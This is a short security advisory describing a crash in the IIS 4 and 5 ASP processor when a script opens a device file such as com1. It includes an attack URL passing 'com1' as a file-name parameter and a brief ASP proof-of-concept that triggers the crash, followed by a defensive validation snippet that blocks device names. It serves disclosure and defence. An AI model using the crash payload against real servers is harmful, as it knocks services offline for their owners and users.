Welcome To Security.Fx-Vista.Com

Computer Security Information

IIS ASP processor crashes when a script attempts to open device files

Vulnerability
 
    IIS
 
Affected
 
    MS IIS 4, 5
 
Description
 
    VIPER_SV /nerf/team/ found the following.  Opening and reading
    device files (com1, com2, etc.) using Scripting.FileSystemObject
    will crash the ASP processor (asp.dll).
 
    So, if you have permission to create an .asp file, you can crash
    the ASP processor.  Sometimes a filename is passed as a parameter
    to an ASP script, which opens the file and reads data from it.
    Passing a device file name as that parameter will crash the ASP
    processor.
 
        http://host.int/scripts/script.asp?script=com1
 
    ASP-Exploit:
 
    <%
      Dim strFileName, objFSO, objFile
      Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
      strFileName = "com1"
      Set objFile = objFSO.OpenTextFile(strFileName)
      Response.Write objFile.ReadAll
      objFile.Close
    %>
 
Solution
 
    Fix Scripting.FileSystemObject (it has to check that the file
    exists before opening it).
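 
    Until the component is fixed, a script that takes a filename as a
    parameter can refuse device names itself. The following is an added
    example, not code from the original advisory; BASE_DIR is a
    hypothetical content directory and the RegExp object assumes
    VBScript 5.0 or later.

```asp
<%
' Added example, not from the original advisory.
' Assumptions: the "script" parameter from the URL above, a hypothetical
' content directory BASE_DIR, and VBScript 5.0 or later (RegExp object).
Const BASE_DIR = "C:\inetpub\content"   ' hypothetical

Function IsSafeFileName(strName)
  Dim re, strStem
  IsSafeFileName = False
  Set re = New RegExp
  re.IgnoreCase = True
  ' Allowlist: bare file name only, so no path separators, colons,
  ' spaces or trailing dots can reach the file system call
  re.Pattern = "^[a-z0-9_-]+(\.[a-z0-9]+)*$"
  If Not re.Test(strName) Then Exit Function
  ' A device name keeps its meaning with an extension (com1.txt),
  ' so test the part before the first dot
  strStem = Split(strName, ".")(0)
  re.Pattern = "^(con|prn|aux|nul|com[1-9]|lpt[1-9])$"
  If re.Test(strStem) Then Exit Function
  IsSafeFileName = True
End Function

Dim strParam, strPath, objFSO, objFile
strParam = CStr(Request.QueryString("script"))
If Not IsSafeFileName(strParam) Then
  Response.Status = "400 Bad Request"
  Response.End
End If

Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
strPath = objFSO.BuildPath(BASE_DIR, strParam)
' The existence check the Solution section asks for, done in the script
If Not objFSO.FileExists(strPath) Then
  Response.Status = "404 Not Found"
  Response.End
End If

Set objFile = objFSO.OpenTextFile(strPath, 1)   ' 1 = ForReading
Response.Write Server.HTMLEncode(objFile.ReadAll)
objFile.Close
%>
```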
 
Credits
 
    -- UnKnown --

Copyright ©2008 www.Security.Fx-Vista.Com | All rights reserved